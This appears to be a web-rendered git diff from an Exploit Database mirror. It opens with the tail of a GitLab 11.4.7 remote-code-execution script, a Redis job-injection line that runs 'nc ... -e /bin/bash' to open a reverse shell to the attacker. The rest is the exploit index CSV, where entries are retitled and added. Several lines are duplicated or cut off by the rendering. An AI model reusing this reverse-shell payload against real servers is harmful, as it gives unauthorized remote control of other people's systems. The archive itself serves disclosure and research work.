lpush resque:gitlab:queue:system_hook_push "{\\"class\\":\\"GitlabShellWorker\\",\\"args\\":[\\"class_eval\\",\\"open(\\'|""" + f'nc {local_ip} {local_port} -e /bin/bash' + """ \\').read\\"],\\"retry\\":3,\\"queue\\":\\"system_hook_push\\",\\"jid\\":\\"ad52abc5641173e217eb2e52\\",\\"created_at\\":1608799993.1234567,\\"enqueued_at\\":1608799993.1234567}"
|
||||||
exec
|
exec
|
||||||
exec
|
exec
|
||||||
exec\n"""
|
exec\n"""
|
||||||
|
|
|
@ -43231,7 +43231,7 @@ id,file,description,date,author,type,platform,port
|
||||||
48549,exploits/java/webapps/48549.py,"VMWAre vCloud Director 9.7.0.15498291 - Remote Code Execution",2020-06-04,"Tomas Melicher",webapps,java,
|
48549,exploits/java/webapps/48549.py,"VMWAre vCloud Director 9.7.0.15498291 - Remote Code Execution",2020-06-04,"Tomas Melicher",webapps,java,
|
||||||
48550,exploits/php/webapps/48550.txt,"Navigate CMS 2.8.7 - Authenticated Directory Traversal",2020-06-04,"Gus Ralph",webapps,php,
|
48550,exploits/php/webapps/48550.txt,"Navigate CMS 2.8.7 - Authenticated Directory Traversal",2020-06-04,"Gus Ralph",webapps,php,
|
||||||
48551,exploits/hardware/webapps/48551.txt,"D-Link DIR-615 T1 20.10 - CAPTCHA Bypass",2020-06-04,"huzaifa hussain",webapps,hardware,
|
48551,exploits/hardware/webapps/48551.txt,"D-Link DIR-615 T1 20.10 - CAPTCHA Bypass",2020-06-04,"huzaifa hussain",webapps,hardware,
|
||||||
48552,exploits/php/webapps/48552.sh,"Online Marriage Registration System 1.0 - Remote Code Execution",2020-06-04,Enesdex,webapps,php,
|
48552,exploits/php/webapps/48552.sh,"Online Marriage Registration System 1.0 - Remote Code Execution (1)",2020-06-04,Enesdex,webapps,php,
|
||||||
48553,exploits/multiple/webapps/48553.txt,"Cayin Content Management Server 11.0 - Remote Command Injection (root)",2020-06-04,LiquidWorm,webapps,multiple,
|
48553,exploits/multiple/webapps/48553.txt,"Cayin Content Management Server 11.0 - Remote Command Injection (root)",2020-06-04,LiquidWorm,webapps,multiple,
|
||||||
48554,exploits/hardware/webapps/48554.txt,"SnapGear Management Console SG560 3.1.5 - Cross-Site Request Forgery (Add Super User)",2020-06-04,LiquidWorm,webapps,hardware,
|
48554,exploits/hardware/webapps/48554.txt,"SnapGear Management Console SG560 3.1.5 - Cross-Site Request Forgery (Add Super User)",2020-06-04,LiquidWorm,webapps,hardware,
|
||||||
48556,exploits/hardware/webapps/48556.txt,"Secure Computing SnapGear Management Console SG560 3.1.5 - Arbitrary File Read",2020-06-04,LiquidWorm,webapps,hardware,
|
48556,exploits/hardware/webapps/48556.txt,"Secure Computing SnapGear Management Console SG560 3.1.5 - Arbitrary File Read",2020-06-04,LiquidWorm,webapps,hardware,
|
||||||
|
@ -43524,11 +43524,10 @@ id,file,description,date,author,type,platform,port
|
||||||
49254,exploits/multiple/webapps/49254.txt,"Rumble Mail Server 0.51.3135 - 'domain and path' Stored XSS",2020-12-14,"Mohammed Alshehri",webapps,multiple,
|
49254,exploits/multiple/webapps/49254.txt,"Rumble Mail Server 0.51.3135 - 'domain and path' Stored XSS",2020-12-14,"Mohammed Alshehri",webapps,multiple,
|
||||||
49255,exploits/multiple/webapps/49255.txt,"Rumble Mail Server 0.51.3135 - 'username' Stored XSS",2020-12-14,"Mohammed Alshehri",webapps,multiple,
|
49255,exploits/multiple/webapps/49255.txt,"Rumble Mail Server 0.51.3135 - 'username' Stored XSS",2020-12-14,"Mohammed Alshehri",webapps,multiple,
|
||||||
49256,exploits/hardware/webapps/49256.py,"Macally WIFISD2-2A82 2.000.010 - Guest to Root Privilege Escalation",2020-12-14,"Maximilian Barz",webapps,hardware,
|
49256,exploits/hardware/webapps/49256.py,"Macally WIFISD2-2A82 2.000.010 - Guest to Root Privilege Escalation",2020-12-14,"Maximilian Barz",webapps,hardware,
|
||||||
49257,exploits/ruby/webapps/49257.py,"Gitlab 11.4.7 - Remote Code Execution",2020-12-14,"Fortunato Lodari",webapps,ruby,
|
49257,exploits/ruby/webapps/49257.py,"GitLab 11.4.7 - Remote Code Execution (Authenticated) (1)",2020-12-14,"Fortunato Lodari",webapps,ruby,
|
||||||
49258,exploits/php/webapps/49258.txt,"Task Management System 1.0 - 'page' Local File Inclusion",2020-12-15,"İsmail BOZKURT",webapps,php,
|
49258,exploits/php/webapps/49258.txt,"Task Management System 1.0 - 'page' Local File Inclusion",2020-12-15,"İsmail BOZKURT",webapps,php,
|
||||||
49260,exploits/php/webapps/49260.py,"Online Marriage Registration System (OMRS) 1.0 - Remote Code Execution (Authenticated)",2020-12-15,"Andrea Bruschi",webapps,php,
|
49260,exploits/php/webapps/49260.py,"Online Marriage Registration System (OMRS) 1.0 - Remote Code Execution (2)",2020-12-15,"Andrea Bruschi",webapps,php,
|
||||||
49262,exploits/hardware/webapps/49262.py,"Cisco ASA 9.14.1.10 and FTD 6.6.0.1 - Path Traversal (2)",2020-12-15,Freakyclown,webapps,hardware,
|
49262,exploits/hardware/webapps/49262.py,"Cisco ASA 9.14.1.10 and FTD 6.6.0.1 - Path Traversal (2)",2020-12-15,Freakyclown,webapps,hardware,
|
||||||
49263,exploits/ruby/webapps/49263.py,"GitLab 11.4.7 - Remote Code Execution (Authenticated)",2020-12-16,"Mohin Paramasivam",webapps,ruby,
|
|
||||||
49264,exploits/php/webapps/49264.txt,"Grav CMS 1.6.30 Admin Plugin 1.9.18 - 'Page Title' Persistent Cross-Site Scripting",2020-12-16,"Sagar Banwa",webapps,php,
|
49264,exploits/php/webapps/49264.txt,"Grav CMS 1.6.30 Admin Plugin 1.9.18 - 'Page Title' Persistent Cross-Site Scripting",2020-12-16,"Sagar Banwa",webapps,php,
|
||||||
49265,exploits/linux/webapps/49265.txt,"Raysync 3.3.3.8 - RCE",2020-12-16,james,webapps,linux,
|
49265,exploits/linux/webapps/49265.txt,"Raysync 3.3.3.8 - RCE",2020-12-16,james,webapps,linux,
|
||||||
49266,exploits/android/webapps/49266.py,"Magic Home Pro 1.5.1 - Authentication Bypass",2020-12-16,"Victor Hanna",webapps,android,
|
49266,exploits/android/webapps/49266.py,"Magic Home Pro 1.5.1 - Authentication Bypass",2020-12-16,"Victor Hanna",webapps,android,
|
||||||
|
@ -43585,7 +43584,7 @@ id,file,description,date,author,type,platform,port
|
||||||
49331,exploits/php/webapps/49331.txt,"Baby Care System 1.0 - 'roleid' SQL Injection",2020-12-23,"Vijay Sachdeva",webapps,php,
|
49331,exploits/php/webapps/49331.txt,"Baby Care System 1.0 - 'roleid' SQL Injection",2020-12-23,"Vijay Sachdeva",webapps,php,
|
||||||
49332,exploits/php/webapps/49332.txt,"WordPress Plugin Adning Advertising 1.5.5 - Arbitrary File Upload",2020-12-24,spacehen,webapps,php,
|
49332,exploits/php/webapps/49332.txt,"WordPress Plugin Adning Advertising 1.5.5 - Arbitrary File Upload",2020-12-24,spacehen,webapps,php,
|
||||||
49333,exploits/php/webapps/49333.txt,"WordPress Plugin WP-PostRatings 1.86 - 'postratings_image' Cross-Site Scripting",2020-12-24,"Park Won Seok",webapps,php,
|
49333,exploits/php/webapps/49333.txt,"WordPress Plugin WP-PostRatings 1.86 - 'postratings_image' Cross-Site Scripting",2020-12-24,"Park Won Seok",webapps,php,
|
||||||
49334,exploits/ruby/webapps/49334.py,"GitLab 11.4.7 - RCE (Authenticated)",2020-12-24,"Sam Redmond",webapps,ruby,
|
49334,exploits/ruby/webapps/49334.py,"GitLab 11.4.7 - RCE (Authenticated) (2)",2020-12-24,"Norbert Hofmann",webapps,ruby,
|
||||||
49338,exploits/php/webapps/49338.txt,"Wordpress Core 5.2.2 - 'post previews' XSS",2021-01-04,gx1,webapps,php,
|
49338,exploits/php/webapps/49338.txt,"Wordpress Core 5.2.2 - 'post previews' XSS",2021-01-04,gx1,webapps,php,
|
||||||
49339,exploits/php/webapps/49339.txt,"4images v1.7.11 - 'Profile Image' Stored Cross-Site Scripting",2021-01-04,"Ritesh Gohil",webapps,php,
|
49339,exploits/php/webapps/49339.txt,"4images v1.7.11 - 'Profile Image' Stored Cross-Site Scripting",2021-01-04,"Ritesh Gohil",webapps,php,
|
||||||
49340,exploits/php/webapps/49340.py,"Mantis Bug Tracker 2.24.3 - 'access' SQL Injection",2021-01-04,EthicalHCOP,webapps,php,
|
49340,exploits/php/webapps/49340.py,"Mantis Bug Tracker 2.24.3 - 'access' SQL Injection",2021-01-04,EthicalHCOP,webapps,php,
|
||||||
|
@ -43690,7 +43689,7 @@ id,file,description,date,author,type,platform,port
|
||||||
49477,exploits/php/webapps/49477.txt,"Simple College Website 1.0 - 'full' Stored Cross Site Scripting",2021-01-26,"Marco Catalano",webapps,php,
|
49477,exploits/php/webapps/49477.txt,"Simple College Website 1.0 - 'full' Stored Cross Site Scripting",2021-01-26,"Marco Catalano",webapps,php,
|
||||||
49478,exploits/hardware/webapps/49478.txt,"Tenda AC5 AC1200 Wireless - 'WiFi Name & Password' Stored Cross Site Scripting",2021-01-26,"Chiragh Arora",webapps,hardware,
|
49478,exploits/hardware/webapps/49478.txt,"Tenda AC5 AC1200 Wireless - 'WiFi Name & Password' Stored Cross Site Scripting",2021-01-26,"Chiragh Arora",webapps,hardware,
|
||||||
49479,exploits/java/webapps/49479.py,"Oracle WebLogic Server 12.2.1.0 - RCE (Unauthenticated)",2021-01-26,CHackA0101,webapps,java,
|
49479,exploits/java/webapps/49479.py,"Oracle WebLogic Server 12.2.1.0 - RCE (Unauthenticated)",2021-01-26,CHackA0101,webapps,java,
|
||||||
49483,exploits/multiple/webapps/49483.txt,"Openlitespeed Web Server 1.7.8 - Command Injection (Authenticated)",2021-01-27,SunCSR,webapps,multiple,
|
49483,exploits/multiple/webapps/49483.txt,"Openlitespeed Web Server 1.7.8 - Command Injection (Authenticated) (1)",2021-01-27,SunCSR,webapps,multiple,
|
||||||
49481,exploits/ruby/webapps/49481.txt,"STVS ProVision 5.9.10 - File Disclosure (Authenticated)",2021-01-27,LiquidWorm,webapps,ruby,
|
49481,exploits/ruby/webapps/49481.txt,"STVS ProVision 5.9.10 - File Disclosure (Authenticated)",2021-01-27,LiquidWorm,webapps,ruby,
|
||||||
49482,exploits/ruby/webapps/49482.html,"STVS ProVision 5.9.10 - Cross-Site Request Forgery (Add Admin)",2021-01-27,LiquidWorm,webapps,ruby,
|
49482,exploits/ruby/webapps/49482.html,"STVS ProVision 5.9.10 - Cross-Site Request Forgery (Add Admin)",2021-01-27,LiquidWorm,webapps,ruby,
|
||||||
49484,exploits/php/webapps/49484.txt,"EgavilanMedia PHPCRUD 1.0 - 'Full Name' Stored Cross Site Scripting",2021-01-28,"Mahendra Purbia",webapps,php,
|
49484,exploits/php/webapps/49484.txt,"EgavilanMedia PHPCRUD 1.0 - 'Full Name' Stored Cross Site Scripting",2021-01-28,"Mahendra Purbia",webapps,php,
|
||||||
|
@ -43742,3 +43741,8 @@ id,file,description,date,author,type,platform,port
|
||||||
49550,exploits/multiple/webapps/49550.txt,"Adobe Connect 10 - Username Disclosure",2021-02-09,h4shur,webapps,multiple,
|
49550,exploits/multiple/webapps/49550.txt,"Adobe Connect 10 - Username Disclosure",2021-02-09,h4shur,webapps,multiple,
|
||||||
49551,exploits/php/webapps/49551.txt,"b2evolution 6.11.6 - 'plugin name' Stored XSS",2021-02-10,"Soham Bakore",webapps,php,
|
49551,exploits/php/webapps/49551.txt,"b2evolution 6.11.6 - 'plugin name' Stored XSS",2021-02-10,"Soham Bakore",webapps,php,
|
||||||
49552,exploits/nodejs/webapps/49552.py,"Node.JS - 'node-serialize' Remote Code Execution (2)",2021-02-10,UndeadLarva,webapps,nodejs,
|
49552,exploits/nodejs/webapps/49552.py,"Node.JS - 'node-serialize' Remote Code Execution (2)",2021-02-10,UndeadLarva,webapps,nodejs,
|
||||||
|
49553,exploits/php/webapps/49553.txt,"PEEL Shopping 9.3.0 - 'address' Stored Cross-Site Scripting",2021-02-11,"Anmol K Sachan",webapps,php,
|
||||||
|
49554,exploits/php/webapps/49554.txt,"b2evolution 6.11.6 - 'redirect_to' Open Redirect",2021-02-11,"Nakul Ratti",webapps,php,
|
||||||
|
49555,exploits/php/webapps/49555.txt,"b2evolution 6.11.6 - 'tab3' Reflected XSS",2021-02-11,"Nakul Ratti",webapps,php,
|
||||||
|
49556,exploits/multiple/webapps/49556.py,"Openlitespeed WebServer 1.7.8 - Command Injection (Authenticated) (2)",2021-02-11,"Metin Yunus Kandemir",webapps,multiple,
|
||||||
|
49557,exploits/php/webapps/49557.py,"Online Marriage Registration System (OMRS) 1.0 - Remote code execution (3)",2021-02-11,"Ricardo Ruiz",webapps,php,
|
||||||
|
|
Can't render this file because it is too large.
|
Loading…
Add table
Reference in a new issue